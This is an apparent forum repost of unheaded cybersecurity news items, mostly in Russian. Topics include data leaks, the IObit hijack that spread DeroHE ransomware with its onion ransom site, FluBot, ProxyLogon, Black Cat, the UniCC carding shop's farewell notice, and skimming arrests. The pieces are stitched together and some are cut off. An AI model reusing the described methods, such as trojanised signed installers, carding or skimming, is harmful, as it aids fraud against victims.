Before its closure, WeLeakInfo, which was less than a year old, sold access to stolen information that was gathered from approximately 10,000 database breaches. In total numbers, the site contained 12 billion access credentials from a variety of platforms, including full and usernames, email addresses and passwords and, in some cases, credit card numbers and access to third-party accounts on platforms. e-commerce.
Led by Noam Rotem, vpnMentor’s research team discovereda data breach affecting an enterprise software solution and exposing a database containing filesrelated to a Brazilian financial company called Prisma Promotora.
A software tool was used to manage and interpret data from every aspect of the company’s operations.
Unfortunately, a cloud storage account connected to the software was left unsecured and publicly accessible by the software owner. It compromised the private information of 10,000s of people connected to Prisma Promotora, exposing them to fraud and other dangers.
Company responsible for the leak| Enterprise software provider
---|---
Data exposed| Prisma Promotora’s
Headquarters| Sao Paulo, Brazil
Industry| Consulting and financial services
Size of data in gigabytes| 574 GB
No. of files in S3 Bucket Exposing Prisma Promotera| 717,068 files
No. of lines in SQL database Exposing the Potential ERP Software Company|
10,000s
No. of people exposed| 10,000s
Date range| Mid-2020
Geographical scope| Brazil
Types of data exposed| PII data; photos; credit card details; account
login credentials; audio recordings
Potential impact| Fraud and identity theft; Scams, phishing, and malware;
corporate espionage; theft; account takeover; database takeover
Data storage format| Misconfigured AWS S3 bucket and SQL database
Sometimes, the extent of a data breach and the data’s owner are obvious, and the issue is quickly resolved. But rare are these times. Most often, we need days of investigation before we understand what’s at stake or who’s exposing the data.
Understanding a breach and its potential impact takes careful attention and time. We work hard to publish accurate and trustworthy reports, ensuring everybody who reads them understands their seriousness.
Some affected parties deny the facts, disregarding our research, or playing down its impact. So, we need to be thorough and make sure everything we find is correct and accurate.
In this case, our team originally discovered an unsecured Amazon Web Services (AWS) S3 bucket containing over 570 gigabytes of files and data from a mobile app.
Upon investigating the mobile app, we determined that the data belonged to an Enterprise Resource Planning (ERP) system being used by Prisma Promotora that was connected to the AWS account.
We initially contacted the company we assumed was the owner of the bucket. As they didn’t get back to us, we contacted AWS directly to notify it of the breach. AWS often notifies users of breaches and misconfigurations when we are unsuccessful in doing so.
Meanwhile, we continued investigating the S3 bucket to confirm some additional details. After some additional research, we identified Prisma Promotora as the assumed sole owner of the exposed data, but not the S3 bucket itself. Due to this discovery, we also contacted the company to notify it of the breach and the risk to its customers.
The breach was closed about a month after this.
The S3 bucket contained a massive amount of files from a wide range of sources. While we can’t confirm the data’s origins with 100% certainty, it appears to belong to the company Prisma Promotora, which was using the ERP software to track and manage customer data.
The files exposed huge amounts of Personally Identifiable Information (PII) data for 10,000s of people. This included:
We believe the S3 bucket was a backup, and the data we viewed was not recent. However, the PII data could still be used to compromise the security and safety of the people affected.
Voice recordings and videos in Portuguese apparently belonging to Prisma Promotera were exposed by the bucket misconfiguration.
Numerous voice recordings outlined negotiations for a loan agreement, with a person’s details and financial information explicitly outlined, including the ID number and bank account number.
In another audio recording, a person working at Prisma Promotora can be heard requesting a lot of sensitive information about a customer over the phone.
The photos contained images of credit card photos, identification documents, and more. It’s unclear what the purpose was for people uploading photos of their IDs and debit cards.
Полиция Нидерландов опубликовала предупреждения на популярных русскоязычных и англоязычных хак-форумах (RaidForums и XSS), заявив, что «размещение криминальной инфраструктуры в Нидерландах — безнадежное дело».
 
Публикация этих сообщений последовала за недавней ликвидацией ботнета Emotet, в которой Голландская полиция сыграла решающую роль. Так, именно власти Нидерландов захватили два из трех управляющих сервера Emotet, которые располагались на территории страны.
В своих посланиях правоохранители убеждают участников хак-форумов, что бесполезно злоупотреблять голландскими хостинг-провайдерами для размещения ботнетов и другой преступной деятельности. Полицейские пообещали, что и дальше будут захватывать инфраструктуры преступников, а также приложили к своим сообщениям информационное видео, которое заканчивается словами: «Все совершают ошибки. Мы ждем ваших».
Интересно, что администрация RaidForums не тронула пост правоохранителей, хотя участники форума ответили на него оскорблениями и засомневались в его подлинности. В то же время русскоязычный XSS удалил сообщение, заблокировал учетную запись голландской полиции и разместил в профиле предупреждение, чтобы другие участники форума не доверяли этому пользователю.

Нужно заметить, что в Нидерландах действительно активно борются с киберпреступностью. К примеру, полиция страны известна тем, что ликвидировала 15 DDoS-сервисов за неделю; добилась закрытия хостинговой компании KV Solutions BV, чьи сервера и бэкэнд-инфраструктура использовались для размещения множества IoT-ботнетов; прекратила работу зашифрованной мобильной сети Ennetcom; а также взломала зашифрованные сообщения на конфискованном у Ennetcom сервере.
Источник: xakep.ru/2021/02/18/dutch-police/
Минцифры зовет хакеров ломать "Дію"
Министерство цифровой трансформации в ноябре предложит хакерам попробовать
сломать копию программы "Дія".
Об этом в эфире программы "Свобода слова Савика
Шустера" заявил министр цифровой трансформации
Михаил Федоров, информирует Цензор.НЕТ.
"Есть такая практика мировая, называется она bug bounty. Я обещал это сделать
и запустить. Мы с ноября месяца запускаем bug bounty. Мы собираем белых
хакеров, мы делаем копию "Дії" и будем давать возможность ее сломать", -
рассказал он.
По словам министра, мероприятие будет непубличным, но к участию в нем
приглашают всех желающих.
"Потому что мы очень много аудитов прошли. Но от таких мероприятий появляется
вообще доверие к продуктам", - пояснил Федоров.
Издание Bleeping Computer сообщает, что в минувшие выходные компания IObit, разрабатывающая различные утилиты для Windows, была скомпрометирована, а среди пользователей официального форума теперь распространяется шифровальщик DeroHE.
Проблему заметили, когда участники форума IObit стали получать электронные письма от лица компании, которые гласили, что в качестве подарка пользователи имеют право на бесплатную годовую лицензию на свое ПО.

Ссылка в письме, которая якобы вела на поучение бесплатной лицензии, на самом деле перенаправляла жертв на https://forums.iobit[.]com/promo.html. В настоявшее время эта страница уже не существует, но во время атаки она распространяла файл free-iobit-license-promo.zip (VirusTotal). Этот архив содержал файлы легитимной программы IObit License Manager с настоящей цифровой подписью, однако файл IObitUnlocker.dll был заменен неподписанной и вредоносной версией.
При запуске IObit License Manager.exe запускался и вредоносный IObitUnlocker.dll, а в итоге все это приводило к установке вымогателя DeroHE в C:\Program Files (x86)\IObit\iobit.dll (VirusTotal) и его выполнению.

Поскольку большинство исполняемых файлов было подписано сертификатом IOBit, а архив хостился на сайте компании, пользователи охотно устанавливали малварь, считая, что получили подарок от компании и не замечая подвоха. Судя по сообщениям на форуме IObit (1, 2), атака была нацелена на всех участников форума.
Журналисты Bleeping Computer изучили вымогателя, и пишут, что, судя по записке с требованием выкупа, озаглавленной «Dero Homomorphic Encryption», малварь продвигает криптовалюту DERO. За дешифровку файлов у жертв требуют 200 токенов на сумму около 100 долларов США.

Более того, в записке вымогателей есть ссылка на их onion-сайт (http://deropayysnkrl5xu7ic5fdprz5ixgdwy6ikxe2g3mh2erikudscrkpqd.onion), где хакеры не только принимают оплату, но и предлагают компании IObit заплатить 100 000 DERO, чтобы расшифровать данные всех пользователей сразу. Хакеры заявляют, что все случившееся – вина IObit, и поэтому платить должна именно компания.

Bleeping Computer предполагает, что для реализации этой атаки злоумышленники, скорее всего, взломали форум IObit и получили доступ к учетной записи администратора. Хуже того, форумы компании все еще скомпрометированы и опасны. При их посещении возвращается ошибка 404, но также в браузере появляются диалоговые окна с предложением подписки на уведомления. Если согласиться на получение уведомлений, они действительно начнут приходить, и преимущественно это будет реклама сайтов для взрослых, малвари и другой нежелательный контент.

Кроме того, если кликнуть в любом месте страницы, откроется новая вкладка, тоже показывающая рекламу сайтов для взрослых. Другие разделы сайта, похоже, тоже скомпрометированы и тоже перенаправляют на порносайты.
Вредоносный скрипт, который хакеры внедрили на страницы сайта IObit, можно увидеть ниже.

Представители компании IObit пока никак не прокомментировали случившееся и не отвечают на запросы журналистов.
Источник: xakep.ru/2021/01/19/iobit-hack/
Five more apps, including Qibla Compass, which has over 5 million downloads,
had a relationship with X-Mode according to technical tests.
At least five more Muslim prayer or similar apps worked with data broker
X-Mode, which has sold location data to military contractors and by extension
U.S. military intelligence, according to multiple technical analyses.
The news comes after [the office of Senator Ron Wyden
obtained](https://www.nytimes.com/2021/01/22/us/politics/dia-surveillance-
data.html) and
published
a memo which said staff at the Defense Intelligence Agency (DIA) have been
granted permission to query similar U.S. phone location data without a warrant
five times in the past two and a half years. While the Muslim-focused apps
have stopped sending data to X-Mode, the news still provides context on what
sort of apps have been feeding data to companies that then sell information
indirectly to the military.
"Using an app to check prayer times should not lead a Muslim to become a
victim of government surveillance," Nihad Awad, national executive director of
the Council on American-Islamic Relations, told Motherboard in a statement.
Motherboard [previously found how an app called Muslim
Pro](https://www.vice.com/en/article/jgqm5x/us-military-location-data-xmode-
locate-x) with over 96 million downloads collected granular location data of
its users and sold that data to X-Mode. Motherboard [also found that a similar
app called Salaat First](https://www.vice.com/en/article/xgz4n3/muslim-app-
location-data-salaat-first) sold location data to another broker called
Predicio, which has previously been connected to a supply chain of data that
involves a U.S. law enforcement contractor. U.S. Special Operations Command
(USSOCOM), a branch of the military, has also bought access to products that
use commercial smartphone location data, [Motherboard
reported](https://www.vice.com/en/article/jgqm5x/us-military-location-data-
xmode-locate-x).
The new apps include "Prayer Times: Qibla Compass, Quran MP3 &
Azan;"
"Qibla Finder: Prayer Times, Quran MP3 &
Azan;"
and "Qibla Compass—Prayer Times, Quran MP3 &
Azan."
Qibla Compass, the most popular app of the set, has been downloaded over 5
million times, according to the app's Google Play Store Page.
In early November, Motherboard first identified Qibla Compass as transferring
data to X-Mode. At the time, the developer behind Qibla Compass, a company
called Appsourcehub based in Ahmedabad,
India, did not respond to a request for
comment. Now [an analysis of Android apps](https://www.expressvpn.com/digital-
security-lab/investigation-xoth) that contain X-Mode related code by
ExpressVPN and cybersecurity firm the Defensive Lab Agency corroborates and
adds to Motherboard findings.
Sean O'Brien from the ExpressVPN Digital Security Lab and Esther Onfroy from
the Defensive Lab Agency scanned apps for code that may indicate the presence
of X-Mode within them. Motherboard then compared those results to our own
similar analysis and then intercepted traffic from a selection of the Muslim-
focused apps to verify the transfer of location data (an app containing X-Mode
code does not necessarily mean the app sent data to X-Mode).
Motherboard downloaded historical versions of the apps from APK archive sites,
then ran them on an Android phone and intercepted the apps' traffic. This
confirmed that versions of the apps available in 2020 did send location data
to X-Mode. The current versions available on the Play Store do not transfer
such data. In December, [Apple and Google both banned
X-Mode](https://www.vice.com/en/article/g5bjpx/apple-google-x-mode-xmode-app-
stores) from their respective app stores following Motherboard's Muslim Pro
investigation.
None of the developers behind the various apps responded to a request for
comment. Some developers are responsible for more than one of the apps. Older
versions of
two
other
apps
which provide users with audio recordings of the Quran communicated with a
X-Mode server but did not send granular location data in Motherboard's tests.
The current version of Qibla Compass does provide data to two other companies,
Opensignal and
Tutela. Both of these firms work to test network
connectivity of phones that have apps with their code installed; Tutela sells
information to the telecom industry.
TechCrunch, which also received a copy of ExpressVPN and the Defense Lab
Agency's research [confirmed that one U.S. subway map
app](https://techcrunch.com/2021/01/28/x-mode-location-google-apple-
ban/?guccounter=1) with over 100,000 installs was downloadable from Google
Play, despite the app still sending location data to X-Mode. New York
Subway,
an app for navigating the New York City transit system, asked for permission
to send data specifically to X-Mode for ads and market research, but made no
reference to its government work. The app maker, Desonline, [removed
references to
X-Mode](https://web.archive.org/web/20201127163851/desoline.com/privacy-
policy-1) from its privacy policy
shortly after TechCrunch asked for comment. Google confirmed it took action to
remove the app from Google Play.
The memo the DIA sent to Senator Wyden said that the DIA currently provides
funding to another agency that in turn purchases commercially available
geolocation data from smartphones. The memo added that DIA analysts have used
the database to search for Americans' movements without a warrant, [The New
York Times](https://www.nytimes.com/2021/01/22/us/politics/dia-surveillance-
data.html)[first
reported](https://www.nytimes.com/2021/01/22/us/politics/dia-surveillance-
data.html).
"D.I.A. does not construe the Carpenter decision to require a judicial warrant
endorsing purchase or use of commercially available data for intelligence
purposes," the memo said, referring to the Supreme Court decision that law
enforcement obtaining location data should require a warrant. Other agencies
have also said they don't require a warrant or court order to obtain
commercial location data. In October, [BuzzFeed News
reported](https://www.buzzfeednews.com/article/hamedaleaziz/ice-dhs-cell-
phone-data-tracking-geolocation) on a Department of Homeland Security memo
that argued it did not need a warrant to purchase such data.
The memo did not identify the broker or brokers the DIA sourced the location
data from. It said that the broker or brokers does not separate the data into
American and foreign smartphone users, meaning that the DIA has to process the
data that appears to be from domestic phones and filter those into another
database.
"Americans are sick of learning that their location data is being sold by data
brokers to anyone with a credit card. Industry self-regulation clearly isn't
working—Congress needs to pass tough legislation, [like my Mind Your Own
Business Act](https://www.vice.com/en/article/889m4b/senator-wyden-stop-
agencies-buying-data-warrant), to give consumers effective tools to prevent
their data being sold and to give the FTC the power to hold companies
accountable when they violate Americans' privacy," Senator Ron Wyden said in a
statement.
X-Mode did not respond to a request for comment; the company has not responded
to any of Motherboard's requests since Apple and Google booted X-Mode from
their app stores in December. The company did provide a statement to
TechCrunch which the publication then shared with Motherboard, however.
"The ban on X-Mode's SDK has broader ecosystem implications considering X-Mode
collected similar mobile app data as most advertising SDKs. Apple and Google
have set the precedent that they can determine private enterprises’ ability to
collect and use mobile app data even when a majority of our publishers had
secondary consent for the collection and use of location data," X-Mode CEO
Josh Anton said in the statement. Motherboard previously found apps that sent
to X-Mode did not obtain informed consent to transfer users’ location data. In
these latest tests, Motherboard found a version of The Qibla Finder app
started sending the data to X-Mode before a user had accepted the privacy
policy pop-up in the app.
"We've recently sent a letter to Apple and Google to understand how we can
best resolve this issue together so that we can both continue to use location
data to save lives and continue to power the tech communities' ability to
build location-based products. We believe it's important to ensure that Apple
and Google hold X-Mode to the same standard they hold upon themselves when it
comes to the collection and use of location data," the statement added. Apple
and Google do not sell location data.
Apple was unable to provide a statement in time for publication, and Google
did not respond to a request for comment on X-Mode’s statement.
In an upcoming change to iOS in early spring, Apple says
users will
be able to see which apps have requested permission to track them. It also
said that the company expects app developers to understand which software
development kits (SDKs), bundles of code from companies like X-Mode, they use
and to enable a notification to the user if so.
Жертвами экзит-скама выросшего на 3500% токена SQUID стали 41 000 человек
Токен Squid Game по мотивам одноименного сериала от Netflix обвалился практически до нуля менее, чем через неделю после запуска торгов. Цена монеты упала с 2 856 долларов до отметки в $0,003, согласно CoinMarketCap.
Недавно появившаяся криптовалюта, которая не только привлекла к себе внимание сотен тысяч участников криптосообщества, но и выросла более чем на 3500% всего за пару дней, оказалась очередным скамом. К сожалению, теперь инвесторы не только не сыграют в “смертельную игру”, но и вряд ли когда-либо вернут потерянные ими денежные средства.
Токен появился 26 октября и продолжал свой сумасшедший рост вплоть до сегодняшнего дня, когда ему удалось установить новый рекорд на уровне более 2 856 долларов. Приобрести монету можно было только на PancakeSwap, что, фактически, стало хотя бы малость ограничивающим фактором для разрастания масштабов данного скама. Поскольку такой вид покупки токенов является чуть более сложным, чем "стандартная" покупка на бирже. Иначе денежные потери вкладчиков могли стать катастрофическими.
Чтобы присоединиться к первому раунду “игры” от пользователей требовали взнос в 456 токенов SQUID, а условием участия в финальном раунде являлась покупка 15 000 SQUID и 1 NFT проекта. Однако, заманивали в основном тем, что сумма выигрыша будет “неограниченной”.
Первые тревожные звоночки поступили, когда выяснилось, что домен проекта был зарегистрирован 12 октября этого года, а в white paper содержалось множество грамматических и орфографических ошибок. Не говоря уж о том, что команда Squid Game всячески ограничивала возможность оставлять комментарии в своих аккаунтах в социальных сетях.
Следующим важным моментом, на который обратили внимание даже администраторы CoinMarketCap на странице SQUID, было то, что люди жаловались на невозможность вывода монет с PancakeSwap. Но самым забавным стало, якобы, “одобрение” продаж этого токена со стороны Илона Маска. Сам же бизнесмен говорил об одноименном сериале.
Исходя из данных BscScan, приобрести скам-токены SQUID успели почти 41 000 человек. Разумеется, речь идет о покупках не только на старте проекта, но и в те моменты, когда цена за одну монету уже превышала 1 000 долларов, от чего ситуация становится еще печальнее.
Единственной зацепкой для разозленных инвесторов может стать автор видео, опубликованного на YouTube 20 октября. В ходе него неизвестный рассказывал об airdrop токенов SQUID. Однако, связь с командой проекта пока установить не удалось.
Благодаря темпам роста о монете узнали миллионы людей из таких изданий, как BBC, Business Insider, Yahoo News и многих других. С этой точки зрения количество обманутых в размере 41 000 не выглядит той катастрофой, которой бы оно могло стать, появись SQUID хотя бы на одной из современных криптовалютных бирж.
Всего за несколько дней стоимость SQUID взлетела до 2861 доллара, а утром 1 ноября резко упала до 0 после того, как ее создатели быстро обналичили свои токены, исчерпав пул ликвидности на бирже. Gizmodo пишет, что такой вид мошенничества называется "перетягивание ковра".
Сайт крипотвалюты сразу же был удален, в интернете можно увидеть только его копию.
Два российских гражданина внесены в американский санкционный список, сообщили 16 сентября в американском минфине.
Сегодня в координации с Минюстом США и министерством внутренней безопасности Управление по контролю за иностранными активами Минфина США внесло в санкционный список двух россиян за их участие в сложной фишинговой кампании в 2017-м и 2018-м годах, которая была направлена против клиентов двух американских и одного иностранного провайдера услуг [в сфере] виртуальных активов", - говорится в сообщении. В результате указанных кибератак общие убытки американских граждан и компаний составили $16,8 млн.
Упомянуты москвич Дмитрий Карасавиди (1985 г.р.) и житель Воронежа Данил Потехин (1995 г.р.).
Согласно обвинительному заключению Минюста США, Данил Потехин создал множество веб-доменов, имитирующих законные виртуальные обменники (тактика, известная как спуфинг, использует доверие интернет-пользователей к известным компаниям для получения обманом их личной информации). Залогинившись на поддельном веб- сайте, люди невольно передавали свою информацию Потехину и связанным с ним лицам. Карасавиди обвиняется в том, что занимался отмыванием незаконно полученных средств с помощью своего личного счета.
• Source: hххps://home.treasury.gov/news/press-releases/sm1123
На прошлой неделе власти Барселоны сообщили о задержании четырех подозреваемых в управлении Android-ботнетом FluBot, который уже заразил больше 60 000 устройств.
Впервые FluBot был замечен экспертами компании ThreatFabric в начале текущего года, а недавно аналитики швейцарской фирмы PRODAFT подготовили о подробный отчет от этой малвари. Судя по всему, именно собранные экспертами данные и привели к аресту операторов малвари.
FluBot представляет собой банковский троян, который способен показывать фейковые экраны логина поверх других приложений. Таким образом вредонос собирает учетные данные от электронного банкинга и данные платежных карт своих жертв.
Внушительное количество заражений FluBot, скорее всего, объясняется наличием в его коде малвари червеобразного механизма, благодаря которому злоумышленники могут загрузить адресную книгу жертвы на свой управляющий сервер, и рассылать оттуда вредоносный SMS-спам. Аналитики PRODAFT предупреждали, что с зараженных устройств было собрано более 11 000 000 телефонных номеров (почти 25% всего населения Испании), а каталонские официальные лица говорят, что отследили не менее 71 000 спам-сообщений, отправленных группой.
Испанские правоохранители сообщают, что ими были задержаны четверо мужчин в возрасте от 19 до 27 лет, чьи имена не разглашаются. Двое из них считаются лидерами группировки и оставлены под стражей, тогда как еще двое были отпущены на свободу, но обязаны явиться в суд. Похоже, один из лидеров хак-группы отвечал за техническую сторону операций FluBot, написал малварь и создавал фальшивые страницы логина для имитации различных банкингов.
Следователи также провели обыски в квартирах подозреваемых, где изъяли наличные, ноутбуки, документы и мобильные устройства. Якобы некоторые из этих мобильных устройств были куплены на деньги пострадавших.
«Помимо совершения денежных переводов [со счетов жертв], преступники расплачивались картами пострадавших и покупали люксовые мобильные телефоны, которые отправляли людям, проживающим в провинции Мадрид и получавшим деньги за получение посылок», — рассказывают власти.
Click to expand...
__https://twitter.com/x/status/1367797770522943489
Несмотря на эти аресты, FluBot по-прежнему активен и продолжает распространяться. Пока неясно, остались ли на свободе другие члены хакерской группы, руководящие ботнетом, или управляющие серверы вредоноса работают автоматически, и сейчас ботнет функционирует «по инерции».
Источник: xakep.ru/2021/03/10/flubot-arrest/
На прошлой неделе инженеры Microsoft выпустили внеплановые патчи для четырех уязвимостей в почтовом сервере Exchange, которым исследователи дали общее название ProxyLogon ([CVE-2021-26855](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-26855), [CVE-2021-26857](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-26857), [CVE-2021-26858](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-26858) и [CVE-2021-27065](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-27065)). По сути, эти уязвимости можно объединить в цепочку, а их эксплуатация позволит злоумышленнику пройти аутентификацию на сервере Exchange, получить права администратора, установить малварь и похитить данные.
Как мы уже писали ранее, многие ИБ-компании предупреждали о массовых атаках на эту цепочку уязвимостей. Сначала ProxyLogon эксплуатировала только китайская хакерская группа Hafnium, но когда информация о проблемах была опубликована в широком доступе, к делу подключились и другие злоумышленники.
По информации аналитиков компании ESET, в настоящее время [по меньшей мере десять](https://www.welivesecurity.com/2021/03/10/exchange-servers-under- siege-10-apt-groups/) хак-групп используют ошибки ProxyLogon для установки бэкдоров на серверы Exchange по всему миру.
[](https://xakep.ru/wp- content/uploads/2021/03/342698/ProxyLogon-timeline.png)Хронология атак на ProxyLogon , составленная Microsoft
Хуже того, исследователи голландской некоммерческой организацией DIVD просканировали интернет в поисках уязвимых серверов Microsoft Exchange и [пришли к выводу](https://csirt.divd.nl/2021/03/08/Exchange-vulnerabilities- update/), что более 46 000 из 250 000 доступных серверов до сих пор не защищены и работают без патчей. По итогам проверки исследователи и помогающие им волонтеры постарались предупредить уязвимые компании и организации о проблемах, связавшись с местными CERT, провайдерами и представителями компаний напрямую.
__https://twitter.com/x/status/1369302347617349642
С момента раскрытия данных об уязвимостях на GitHub было опубликовано несколько PoC-эксплоитов, однако большинство из них оказывались обычным троллингом или не работали должным образом.
Теперь же независимый ИБ-исследователь из Вьетнама представил [настоящий PoC- эксплоит](https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng- proxylogon-mail-exchange- rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265), чью работоспособность уже подтвердили такие известные эксперты, как Маркус Хатчинс из Kryptos Logic, Дэниел Кард из PwnDefend и Джон Уэтингтон из Condition Black.
__https://twitter.com/x/status/1369729825104007169
PoC объединяет в себе уязвимости CVE-2021–26855 и CVE-2021–27065 для аутентификации на сервере Exchange и последующего запуска вредоносного кода. Хатчинс пишет, что представленный исследователем код нельзя использовать прямо «из коробки», но его можно легко модифицировать, превратив в полноценный RCE- инструмент.
Также стоит отметить, что на днях компания Praetorian обнародовала подробный обзор уязвимостей ProxyLogin, хотя и воздержалась от публикации собственного эксплоита. Тем не менее, многие исследователи раскритиковали этот отчет, так как, по их мнению, он лишь ускорит разработку эксплоитов, что привлечет к атакам еще больше злоумышленников.
Источник: xakep.ru/2021/03/11/proxylogon-poc/
Родители 13-летней девочки, увлекающейся играми, в китайской провинции Хэнань испытали сильнейший в своей жизни шок, когда узнали, что она потратила 449,500 юаней (63 000 долларов) на мобильные игры.
Представьте, что вы проверяете сберегательный счет, на который годами вкладывали деньги, и видите, что он опустел за одну ночь. Именно так чувствовала себя одна мать в Китае, когда обнаружила, что кто-то оставил всего 0,5 юаня из 449,500 юаней (63 000 долларов), которые они с мужем откладывали годами.
Еще более шокирующим было открытие, что виновницей была ее дочь-подросток, которая использовала дебетовую карту женщины, чтобы подпитывать свою зависимость от видеоигр. Девочке удалось истощить сберегательный счет примерно за четыре месяца, но ей удалось сохранить свою привычку тратить в секрете от матери, удалив всю банковскую историю со своего телефона.
Только после того, как учительница девочки заметила, что она проводит слишком много времени со своим мобильным телефоном в школе, и сообщила об этом ее матери, ее мать начала понимать, что что-то может быть не так.
По данным South China Morning Post, 13-летняя девочка потратила 330 000 юаней на покупку игр и совершение внутриигровых покупок, а также около 100 000 юаней на покупку игр для своих одноклассников. Девочка сказала, что чувствовала давление со стороны своих одноклассников и беспокоилась, что ее родители «узнают» о ее игровых привычках и «рассердятся», поэтому она решила порадовать их, купив игры для них с помощью кредитной карты своей матери.
«Когда мои друзья попросили меня заплатить за игры, я заплатила, хотя мне было неудобно», - сказала девочка.
Мать 13-летней девочки призналась, что совершила ошибку, дав девочке ПИН-код своей дебетовой карты на случай, если ей срочно понадобятся деньги для экстренных случаев. Она никогда не представляла, что ее дочь истощит семейный сберегательный счет всего за четыре месяца.
Недавние атаки на нефтебазы в Германии связаны с атакой на Colonial Pipeline.
За недавними атаками на нефтяные компании в Германии может стоять кибервымогательская группировка, связанная с Россией, пишет Bloomberg.
Напомним , в конце прошлой недели вымогательское ПО Black Cat заразило компьютеры нефтебаз Mabanfaft и Oiltanking. Хотя компании не раскрывали характер кибератак, как ранее сообщала немецкая газета Handelsblatt, они стали жертвами вымогательского ПО Black Cat (другое название ALPHV).
По данным аналитика ИБ-компании Emsisoft Бретта Кэллоу (Brett Callow), операторы Black Cat связаны с кибервымогательской группировкой DarkSide, известной своей прошлогодней атакой на американскую топливную компанию Colonial Pipeline.
Согласно отчету подразделения Unit 42 компании Palo Alto Networks, код Black Cat отличается высокой сложностью. Операторы вредоноса начали свою деятельность в ноябре 2021 года и вербуют партнеров через хакерские форумы. Black Cat уже использовался в атаках на компании и организации в США, Германии, Франции, Испании, Нидерландах и на Филиппинах.
«Как для новой группировки, они очень опытные. Все кибервымогательские группировки используют одни и те же методы. Однако Black Cat перемещаются по сетям очень быстро. Они быстро заполучают данные и не боятся атаковать крупные цели», - сообщил старший аналитик ИБ-компании Recorded Future Аллан Лиска (Allan Liska).
Лиска отметил, что участники группировки являются русскоговорящими. По мнению Кэллоу, Black Cat это новая реинкарнация все тех же небезызвестных BlackMatter и DarkSide.
После атаки на Colonial Pipeline правоохранительные органы всерьез взялись за кибервымогательские группировки, и DarkSide была вынуждена сменить название на BlackMatter. Однако и BlackMatter приказала долго жить, отчасти из-за уязвимости в ее вымогательском ПО, которую обнаружили специалисты Emsisoft. Как считает Кэллоу, после неудачи BlackMatter организаторы группировки наняли новых разработчиков и снова сменили название, на этот раз вернувшись как Black Cat.
С 2013 года на подпольной площадке было совершено покупок на сумму $358 млн в криптовалюте.
Администрация крупнейшей в даркнете площадки по продаже данных украденных кредитных карт UniCC объявила о закрытии платформы. По оценкам специалистов из компании Elliptic, с 2013 года на подпольной площадке было совершено покупок на сумму $358 млн в биткойнах, Litecoin, Ether и Dash.
**!ВНИМАНИЕ!
Наша команда уходит на пенсию. Спасибо всем, кто был с нами на протяжение многих лет. Верным партнерам, клиентам, коллегам кто оказывал различную помощь. Я бы выделил или поблагодарил отдельно каждого, да это будет не секурно и не профессионально.
Если я или кто-то из нашей команды Вас подвел или не оправдал Ваших надежд
- мы искренне извиняемся.
Не стройте конспирологические теории о нашем уходе, это взвешанное решение, нам давно не мало лет и в таком режиме жить/работать более здоровье не позволяет.
Мы даем 10 дней всем потратить свой баланс(мы продолжим заливать апы), партнеры кто продавал у нас - не переживайте, я не уйду пока каждый цент не выплачу. А после...Unicc и LuxSocks на всегда уйдут из виртуального пространства. Прошу быть бдительней и не вестись после на фейки с возвращением нас и прочей ерунды.
С Уважением, верная Unicc Team.!WARNING!
Our team retires. Thanks to everyone who has been a part of us for years. To loyal partners, clients and collegues who assisted in many ways. I would separately thank each one but it is not professional. If I or some of our team members failed your expectations - we trully sorry.
Don't build any conspiracy theories about us leaving, it is weighted decision, we are not young and our health do not allow to work like this any longer.
We give you 10 days to spend your balance (we will continue updates during this period). To all the partners selling with us - do not worry, you will be paid up to last cent. After all... Unicc and LuxSocks will leave for ever. We ask you to be smart and not follow any fakes tied to our comeback and other things.
Sincerely, your Unicc Team. **Click to expand...
Сообщение о прекращении деятельности было опубликовано на англо- и русскоязычных хакерских форумах. Это произошло спустя год после того, как администратор другой площадки Joker's Stash ушел «на пенсию» миллиардером. UniCC воспользовалась пробелом на рынке, оставленным Joker’s Stash, и быстро стала лидером с долей рынка в 30%.
Сотни миллионов данных платежных карт были украдены из интернет-магазинов, банков и платежных компаний, а затем проданы за криптовалюту на таких online- рынках, как UniCC. Данные украденных карт используются для покупки дорогостоящих товаров или подарочных карт, которые затем можно перепродать за наличные. Этот процесс известен как «кардинг» и стал ключевой частью стратегии киберпреступников. Кардинг также используется для отмывания и обналичивания криптовалюты, полученной в результате других видов киберпреступлений.
В октябре 2021 года один из крупнейших рынков даркнета White House Market также объявил о закрытии. За ним последовали Cannazon в ноябре и Torrez в декабре. Оба специализировались на продаже запрещенных веществ.
Волна недавних закрытий площадок потенциально послужила толчком для UniCC, поскольку нелегальные торговцы видят возможность либо сбежать со средствами пользователей, либо уйти в отставку, избежав повышенного внимания со стороны правоохранительных органов. Например, в июле 2021 года в рамках совместной операции правоохранительные органы США, Германии, Нидерландов и Румынии отключили инфраструктуру подпольной торговой площадки Slilpp.
source: elliptic.co/blog/unicc-the-largest-dark-web-vendor-of-stolen-credit- cards-retires-after-raking-in-358-million-in-crypto
Испанская полиция арестовала троих подозреваемых в мошенничестве с банковскими картами. Кардеры использовали клонированные с помощью скиммеров карточки, что позволило им украсть порядка 196 тысяч евро. Вся троица была задержана в Валенсии после спецоперации, в которой приняли участие сотрудники отдела по борьбе с киберпреступностью и финансовым мошенничеством испанской полиции.
Следствие выяснило, что сначала преступники устанавливали скиммеры и микрокамеры на банкоматы. Это позволяло копировать и сохранять данные с магнитных полос банковских карт, а также фиксировать пин-коды испанцев. Затем происходил непосредственно этап клонирования данных на чистый пластик. Кроме того, известно, что группировка рассылала фишинговые письма и использовала ложные онлайн-профили для сбора паролей и другой информации, например документов, удостоверяющих личность пользователей.
При задержании у мошенников были конфискованы картридер, 300 банковских карт, в том числе поддельных, шесть скиммеров и 13 конфигурационных пластин для скиммеров. Двое подозреваемых оставались под стражей, полиция ищет остальных членов группировки.
source: govinfosecurity.com/spanish-police-arrest-3-suspected-payment-card- fraud-a-22750
20-летнюю жительницу Волгограда ждут два года в тюрьме за участие в мошеннической схеме по отъему денег у пенсионеров посредством обмана по телефону. Она была курьером – забирала деньги у жертв и относила злоумышленникам. Мошенники как дозванивались до своих жертв, так и продолжают дозваниваться – усилия операторов и властей должного эффекта не дают.
10% жизни
Жительница Волгограда Анастасия Звонникова по решению Дзержинского районного суда Волгограда проведет два года своей жизни в колонии общего режима за участие в схеме телефонного мошенничества. Это 10% ее жизни, поскольку на момент оглашения приговора ей было всего 20 лет.
